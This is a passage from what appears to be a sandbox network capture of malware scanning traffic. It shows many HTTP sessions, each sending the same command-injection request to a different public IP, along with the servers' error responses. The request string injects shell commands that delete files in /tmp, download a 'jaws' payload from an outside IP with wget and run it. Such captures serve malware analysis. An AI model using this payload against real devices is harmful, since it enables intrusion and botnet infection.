                                                          Data Ascii: obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQG
                                                          Jan 2, 2024 06:25:34.817174911 CET1286INData Raw: 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d
                                                          Data Ascii: Rm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT
                                                          Jan 2, 2024 06:25:34.817189932 CET529INData Raw: 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46
                                                          Data Ascii: p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5
                                                          Jan 2, 2024 06:25:34.817293882 CET1286INData Raw: 42 4e 42 37 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56
                                                          Data Ascii: BNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code
                                                          Jan 2, 2024 06:25:34.817312956 CET922INData Raw: 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70
                                                          Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> (none)/shell?cd+/tmp;rm+-rf+*;wget+ (port 80)


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          595192.168.2.235269813.227.73.8580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.683145046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.842896938 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          596192.168.2.234110499.79.174.3180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.689899921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.856452942 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          597192.168.2.235911052.218.179.4580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.705547094 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.887778997 CET636INHTTP/1.1 505 HTTP Version not supported
                                                          Date: Tue, 02 Jan 24 05:25:34 GMT
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          x-amz-id-2: CifCiGeyr61S84S7WMaWGf/tvN9hkugLca9yOw4wZgQkAhQHACi0RWnvom+jlycqRKC0UdOdZpeHMkkVeU74V3shYNCOXUmy
                                                          x-amz-request-id: ED48292C8DB31ADB
                                                          Content-Type: application/xml
                                                          Server: AmazonS3
                                                          Data Raw: 31 33 30 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 48 74 74 70 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 48 54 54 50 20 76 65 72 73 69 6f 6e 20 73 70 65 63 69 66 69 65 64 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 45 44 34 38 32 39 32 43 38 44 42 33 31 41 44 42 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 43 69 66 43 69 47 65 79 72 36 31 53 38 34 53 37 57 4d 61 57 47 66 2f 74 76 4e 39 68 6b 75 67 4c 63 61 39 79 4f 77 34 77 5a 67 51 6b 41 68 51 48 41 43 69 30 52 57 6e 76 6f 6d 2b 6a 6c 79 63 71 52 4b 43 30 55 64 4f 64 5a 70 65 48 4d 6b 6b 56 65 55 37 34 56 33 73 68 59 4e 43 4f 58 55 6d 79 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 130<?xml version="1.0" encoding="UTF-8"?><Error><Code>HttpVersionNotSupported</Code><Message>The HTTP version specified is not supported.</Message><RequestId>ED48292C8DB31ADB</RequestId><HostId>CifCiGeyr61S84S7WMaWGf/tvN9hkugLca9yOw4wZgQkAhQHACi0RWnvom+jlycqRKC0UdOdZpeHMkkVeU74V3shYNCOXUmy</HostId></Error>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          598192.168.2.2339898201.192.158.13080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.727411985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.932440996 CET59INHTTP/1.1 400 Bad Request
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          599192.168.2.2339268104.121.24.21280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.772505999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.021729946 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 30 39 38 31 30 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 34 26 23 34 36 3b 38 37 64 30 37 37 31 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;60981002&#46;1704173134&#46;87d0771c</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          600192.168.2.233999035.244.131.880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.794177055 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.915853024 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          601192.168.2.2347752154.219.183.10280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.822357893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.121226072 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          602192.168.2.235924023.222.136.16680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.867651939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.211955070 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 36 30 63 31 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 35 26 23 34 36 3b 34 61 64 32 35 35 30 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ac60c117&#46;1704173135&#46;4ad2550e</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          603192.168.2.235108224.90.220.12480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.883177042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.072665930 CET911INHTTP/1.0 404 Not Found
                                                          Server: SonicWALL
                                                          Expires: -1
                                                          Cache-Control: no-cache
                                                          Content-type: text/html;charset=UTF-8
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget </span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          604192.168.2.234259618.67.147.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.896348000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.269094944 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          605192.168.2.235744637.97.157.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.999588013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.226856947 CET406INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Server: Apache/2
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          606192.168.2.233592234.196.134.24780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.999780893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.158305883 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          607192.168.2.235238077.74.207.20380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:35.073405027 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.347615004 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
